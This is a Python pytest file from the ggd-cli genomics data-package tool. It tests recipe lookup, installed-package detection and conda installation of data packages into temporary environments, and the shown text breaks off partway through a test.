| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b75974c7a904e9e759536da979158aa41d27260e
| 119,005
|
py
|
Python
|
tests/test_install.py
|
gogetdata/ggd-cli
|
717d37643f3e29813f47eda68b9745459d9ef430
|
[
"MIT"
] | 29
|
2016-04-23T13:28:51.000Z
|
2021-10-03T15:49:29.000Z
|
tests/test_install.py
|
gogetdata/ggd-cli
|
717d37643f3e29813f47eda68b9745459d9ef430
|
[
"MIT"
] | 17
|
2016-04-22T15:45:33.000Z
|
2020-11-20T16:47:24.000Z
|
tests/test_install.py
|
gogetdata/ggd-cli
|
717d37643f3e29813f47eda68b9745459d9ef430
|
[
"MIT"
] | 2
|
2016-05-26T01:54:51.000Z
|
2020-04-30T19:17:18.000Z
|
from __future__ import print_function
import os
import sys
import subprocess as sp
import pytest
import yaml
import tempfile
import requests
import argparse
import json
import re
import time
import shutil
from copy import deepcopy
from argparse import Namespace
from argparse import ArgumentParser
import glob
import contextlib
import tarfile
import glob
from helpers import CreateRecipe, install_hg19_gaps_ucsc_v1, uninstall_hg19_gaps_ucsc_v1
from ggd import install
from ggd import utils
from ggd import uninstall
from ggd.utils import CondaEnvironmentNotFound
from ggd.utils import get_conda_package_list
from ggd.utils import ChecksumError
if sys.version_info[0] == 3:
from io import StringIO
elif sys.version_info[0] == 2:
from StringIO import StringIO
from conda.base.context import context
CONDA_ROOT = context.target_prefix
#---------------------------------------------------------------------------------------------------------
## enable socket
#---------------------------------------------------------------------------------------------------------
from pytest_socket import enable_socket
def pytest_enable_socket():
enable_socket()
#---------------------------------------------------------------------------------------------------------
## Test Label
#---------------------------------------------------------------------------------------------------------
TEST_LABEL = "ggd-install-test"
#---------------------------------------------------------------------------------------------------------
## IO redirection
#---------------------------------------------------------------------------------------------------------
## Create a redirect_stdout that works for python 2 and 3. (Similar to contextlib.redirect_stdout in python 3)
@contextlib.contextmanager
def redirect_stdout(target):
original = sys.stdout
sys.stdout = target
yield
sys.stdout = original
## Create a redirect_stderr that works for python 2 and 3. (Similar to contextlib.redirect_stderr in python 3)
@contextlib.contextmanager
def redirect_stderr(target):
original = sys.stderr
sys.stderr = target
yield
sys.stderr = original
#---------------------------------------------------------------------------------------------------------
## Unit Tests for ggd install
#---------------------------------------------------------------------------------------------------------
def remove_pfam():
"""
Helper script to setup install run
"""
## Uninstall pfam for later use
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
if ggd_recipe in str(sp.check_output(["conda", "list"]).decode('utf8')):
try:
uninstall.uninstall((),Namespace(channel='genomics', command='uninstall', names=[ggd_recipe]))
sp.check_output(["conda", "uninstall", "-y", ggd_recipe])
except:
pass
def test_check_ggd_recipe_fake_recipe():
"""
Test the check_ggd_recipe function returns None if an invalide recipe is provided
"""
pytest_enable_socket()
remove_pfam()
assert install.check_ggd_recipe("Not_a_real_recipe","genomics") == None
def test_check_ggd_recipe_fake_channel():
"""
Test the check_ggd_recipe function exits if an invalide ggd channel is provided
"""
pytest_enable_socket()
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.check_ggd_recipe("hg19-gaps-ucsc-v1","ggd-fake-channel")
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
assert pytest_wrapped_e.match("The 'ggd-fake-channel' channel is not a ggd conda channel") ## Check that the exit code is 1
def test_check_ggd_recipe_good_run():
"""
Test the check_ggd_recipe function returns a dict with information from the recipe
"""
pytest_enable_socket()
tmp_recipe = "hg19-gaps-ucsc-v1"
jdict = install.check_ggd_recipe(tmp_recipe,"genomics")
assert type(jdict) == type(dict())
assert jdict["packages"][tmp_recipe]
assert jdict["packages"][tmp_recipe]["identifiers"]["species"] == "Homo_sapiens"
assert jdict["packages"][tmp_recipe]["identifiers"]["genome-build"] == "hg19"
def test_check_if_installed_recipe_not_installed():
"""
Test if the check_if_installed function correclty identifies that the ggd data package is not installed.
"""
pytest_enable_socket()
recipe = "Fake_hg19-gaps"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
assert install.check_if_installed(recipe,ggd_jdict) == False
def test_check_if_installed_recipe_is_installed():
"""
Test if the check_if_installed function correclty identifies that the ggd data package is installed.
"""
pytest_enable_socket()
recipe = "hg19-gaps-ucsc-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
species = ggd_jdict["packages"][recipe]["identifiers"]["species"]
build = ggd_jdict["packages"][recipe]["identifiers"]["genome-build"]
version = ggd_jdict["packages"][recipe]["version"]
CONDA_ROOT = utils.conda_root()
path = os.path.join(CONDA_ROOT,"share","ggd",species,build,recipe,version)
path_added = False
if not glob.glob(path):
os.makedirs(path)
path_added = True
## If a package is installed, check_if_installed returns True
assert install.check_if_installed(recipe,ggd_jdict) == True
if path_added:
os.rmdir(path) ## Remove the bottom directory from the path if it was created.
def test_check_if_installed_with_prefix_set():
"""
Test that the ggd can identify in a data package has been installed in a different (targeted) conda environemnt
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env"])
## Check that an uninstalled data package is correclty stated as such
recipe = "Fake_hg19-gaps"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
assert install.check_if_installed(recipe,ggd_jdict,prefix=temp_env) == False
## Check that an installed data package is stated as such
ggd_package = "hg19-pfam-domains-ucsc-v1"
sp.check_output(["ggd", "install", "--prefix", temp_env, ggd_package])
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-pfam-domains-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'16-Apr-2017'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/hg19-pfam-domains-ucsc-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'pfam', u'domains',u'protein',u'protein-domains',u'UCSC',u'bed',u'bed-file'],
u'summary': u'Pfam domain annotation in bed12 format. (From UCSC)', u'text_prefix': False,
u'identifiers': {u'genome-build': u'hg19', u'species': u'Homo_sapiens'}}}}
species = ggd_jdict["packages"][ggd_package]["identifiers"]["species"]
build = ggd_jdict["packages"][ggd_package]["identifiers"]["genome-build"]
version = ggd_jdict["packages"][ggd_package]["version"]
## If a package is installed, check_if_installed returns True
assert install.check_if_installed(ggd_package,ggd_jdict,prefix=temp_env) == True
file1 = "{}.bed12.bed.gz".format(ggd_package)
file2 = "{}.bed12.bed.gz.tbi".format(ggd_package)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file2)) == False
## Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_check_conda_installation_pacakge_no_installed():
"""
Test check conda instllation function correclty identifies that a data pacakges is not installed by conda
"""
pytest_enable_socket()
recipe = "Fake-hg19-gaps"
version = "1"
assert install.check_conda_installation(recipe,version) == False
def test_check_conda_installation_pacakge_is_installed():
"""
Test check conda instllation function correclty identifies that a data pacakges has been installed by conda.
This method calls the install_hg19_gaps to run.
"""
pytest_enable_socket()
## Install hg19-gaps-ucsc-v1
recipe = "hg19-gaps-ucsc-v1"
args = Namespace(channel='genomics', command='install', debug=False, name=[recipe], file=[] , prefix=None, id = None)
try:
install.install((), args)
except SystemExit:
pass
jdict = install.check_ggd_recipe(recipe,"genomics")
version = jdict["packages"][recipe]["version"]
## Test that it is already installed
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.check_conda_installation(recipe)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
try:
uninstall_hg19_gaps_ucsc_v1()
except:
pass
def test_check_conda_installation_pacakge_no_installed_longer_package_name():
"""
Test check conda instllation function correclty identifies that a data pacakges is not installed by conda
"""
pytest_enable_socket()
recipe = "hg19-gapsss-ucsc-v1"
assert install.check_conda_installation(recipe) == False
def test_check_conda_installation_pacakge_no_installed_shorter_package_name():
"""
Test check conda instllation function correclty identifies that a data pacakges is not installed by conda
"""
pytest_enable_socket()
recipe = "hg19-ga"
assert install.check_conda_installation(recipe) == False
def test_check_conda_installed_with_prefix_set():
"""
Test that an installed data package designated by the prfeix flag can be detected by conda
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env2")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env2"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env2"])
## Check that an uninstalled package in a specific prefix is properly identified
ggd_package = "hg19-pfam-domains-ucsc-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-pfam-domains-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'16-Apr-2017'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/hg19-pfam-domains-ucsc-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'pfam', u'domains',u'protein',u'protein-domains',u'UCSC',u'bed',u'bed-file'],
u'summary': u'Pfam domain annotation in bed12 format. (From UCSC)', u'text_prefix': False,
u'identifiers': {u'genome-build': u'hg19', u'species': u'Homo_sapiens'}}}}
assert install.check_conda_installation(ggd_package,prefix=temp_env) == False
## Check that an installed data package is stated as such
sp.check_output(["ggd", "install", "--prefix", temp_env, ggd_package])
species = ggd_jdict["packages"][ggd_package]["identifiers"]["species"]
build = ggd_jdict["packages"][ggd_package]["identifiers"]["genome-build"]
version = ggd_jdict["packages"][ggd_package]["version"]
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.check_conda_installation(ggd_package,prefix=temp_env)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
file1 = "{}.bed12.bed.gz".format(ggd_package)
file2 = "{}.bed12.bed.gz.tbi".format(ggd_package)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file2)) == False
## Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env2"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_get_idname_from_metarecipe():
"""
Method to test if the get_idname_from_metarecipe() correctly returns the right name
"""
accession_id = "GSE123"
meta_recipe = "meta-recipe-geo-accession-geo-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
## This method does not change case
assert new_name != "gse123-geo-v1"
assert new_name == "GSE123-geo-v1"
accession_id = "gds456"
meta_recipe = "meta-recipe-geo-accession-geo-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
## This method does not change case
assert new_name == "gds456-geo-v1"
accession_id = "GsM99890"
meta_recipe = "meta-recipe-geo-accession-geo-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
## This method does not change case
assert new_name == "GsM99890-geo-v1"
accession_id = "GsM99890"
meta_recipe = "meta-recipe-geo-accession-geo-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'THE-DATA-PROVIDER'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
## Test that the data provider is changed to lower case
assert new_name == "GsM99890-the-data-provider-v1"
accession_id = "GsM99890"
meta_recipe = "meta-recipe-geo-accession-geo-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
False, u'version': u'THE-VERSION', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'geo'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
## Test that the version is properly used
assert new_name == "GsM99890-geo-vTHE-VERSION"
def test_check_S3_bucket_not_uploaded():
"""
Test if a recipe is cached on s3 or not.
"""
pytest_enable_socket()
recipe = "hg19-gaps-ucsc-v1"
## If no tags key avaible return false
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'post_link': True, u'binary_prefix': False, u'run_exports': {},
u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
assert install.check_S3_bucket(recipe, ggd_jdict) == False
## If not cached key in tags return false
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'ggd-channel': u'genomics', u'data-version': u'27-Apr-2009'},
u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink': False, u'subdirs':
[u'noarch'], u'deactivate.d': False, u'reference_package': u'noarch/hg19-gaps-v1-1-1.tar.bz2',
u'pre_link': False, u'keywords': [u'gaps', u'region'], u'summary': u'Assembly gaps from USCS',
u'text_prefix': False, u'identifiers': {u'genome-build': u'hg19', u'species':
u'Homo_sapiens'}}}}
assert install.check_S3_bucket(recipe, ggd_jdict) == False
## If no "uploaded_to_aws" Signature in cached return false
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
assert install.check_S3_bucket(recipe, ggd_jdict) == False
def test_check_S3_bucket_is_uploaded():
"""
Test if a recipe is cached on s3 not.
"""
pytest_enable_socket()
recipe = "hg19-gaps-ucsc-v1"
## Return True if uploaded to aws
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [u'uploaded_to_aws'], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
assert install.check_S3_bucket(recipe, ggd_jdict) == True
def test_install_from_cache():
"""
Test install from cache function for proper installation from cached recipe
"""
pytest_enable_socket()
## Bad install
name = "Fake_hg19-gaps"
ggd_channel = "genomics"
jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.install_from_cached([name], ggd_channel,jdict)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
## Good Install
name = "hg19-cpg-islands-ucsc-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(name,ggd_channel)
os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
assert install.install_from_cached([name], ggd_channel,jdict) == True
### Test that the ggd_info metadata is updated with ggd pkg
pkg_info = get_conda_package_list(utils.conda_root(),name)
assert name in pkg_info.keys()
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
try:
args = Namespace(channel='genomics', command='uninstall', names=[name])
uninstall.uninstall((),args)
except:
pass
## Test with multiple in the list
ggd_recipes = ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1"]
assert install.install_from_cached(ggd_recipes, ggd_channel,jdict) == True
for name in ggd_recipes:
pkg_info = get_conda_package_list(utils.conda_root(),name)
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
for name in ggd_recipes:
args = Namespace(channel='genomics', command='uninstall', names=[name])
assert uninstall.uninstall((),args) == True
def test_install_from_cache_with_prefix_set():
"""
Test install from cache function for proper installation from cached recipe
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env3")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env3"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env3"])
## Bad install
name = "Fake_hg19-gaps"
ggd_channel = "genomics"
jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.install_from_cached([name], ggd_channel,jdict,prefix=temp_env)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
## Good install
name = "hg19-pfam-domains-ucsc-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(name,ggd_channel)
os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
assert install.install_from_cached([name], ggd_channel,jdict,prefix=temp_env) == True
species = jdict["packages"][name]["identifiers"]["species"]
build = jdict["packages"][name]["identifiers"]["genome-build"]
version = jdict["packages"][name]["version"]
file1 = "{}.bed12.bed.gz".format(name)
file2 = "{}.bed12.bed.gz.tbi".format(name)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file2)) == False
## Test that the tarfile and the pkg dir were correctly copied to the prefix
data_packages = get_conda_package_list(temp_env)
version = str(data_packages[name]["version"])
build_number = str(data_packages[name]["build"])
tarfile = "{}-{}-{}.tar.bz2".format(name,version,build_number)
pkgdir = "{}-{}-{}".format(name,version,build_number)
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
### Test that the ggd_info metadata is updated with ggd pkg
pkg_info = get_conda_package_list(temp_env,name)
assert name in pkg_info.keys()
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","channeldata.json"))
with open(os.path.join(temp_env,"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
## Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env3"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_conda_install_bad_recipe():
"""
Test that the conda_install function properly handels a bad recipe
"""
pytest_enable_socket()
## Test with undesignated version
name = "Fake_hg19-gaps"
ggd_channel = "genomics"
jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.conda_install([name], ggd_channel,jdict)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
def test_conda_install():
"""
Test conda install function for proper installation of a ggd recipe using conda
"""
pytest_enable_socket()
try:
uninstall_hg19_gaps_ucsc_v1()
except:
pass
name = "hg19-gaps-ucsc-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(name,ggd_channel)
species = jdict["packages"][name]["identifiers"]["species"]
build = jdict["packages"][name]["identifiers"]["genome-build"]
version = jdict["packages"][name]["version"]
assert install.conda_install([name], ggd_channel,jdict) == True
### Test that the file is in the correct prefix (the current conda root)
file1 = "{}.bed.gz".format(name)
file2 = "{}.bed.gz.tbi".format(name)
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file2))
### Test that the ggd_info metadata is updated with ggd pkg
pkg_info = get_conda_package_list(utils.conda_root(),name)
assert name in pkg_info.keys()
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
